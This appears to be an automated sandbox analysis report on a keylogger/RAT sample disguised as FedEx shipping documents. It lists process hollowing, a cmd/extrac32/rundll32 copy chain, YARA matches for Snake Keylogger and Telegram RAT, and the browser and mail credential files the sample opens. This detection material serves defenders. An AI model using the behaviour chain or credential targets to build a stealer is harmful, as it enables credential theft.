Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: C:\Users\Public\Libraries\hzwdvhxM.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section unmapped: C:\Users\Public\Libraries\hzwdvhxM.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section unmapped: C:\Users\Public\Libraries\hzwdvhxM.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section unmapped: C:\Users\Public\Libraries\hzwdvhxM.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory written: C:\Users\Public\Libraries\hzwdvhxM.pif base: 3DB008	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory written: C:\Users\Public\Libraries\hzwdvhxM.pif base: 3E9008	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory written: C:\Users\Public\Libraries\hzwdvhxM.pif base: 282008

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif

Source: hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02D55510
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: GetLocaleInfoA,	0_2_02D5A17C
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: GetLocaleInfoA,	0_2_02D5A130
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02D5561C
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: GetLocaleInfoA,	7_2_00417A20
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	11_2_03045510
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: GetLocaleInfoA,	11_2_0304A17C
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	11_2_0304561B

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D58BB0 GetLocalTime,

0_2_02D58BB0

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D5B0B0 GetVersionExA,

0_2_02D5B0B0

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
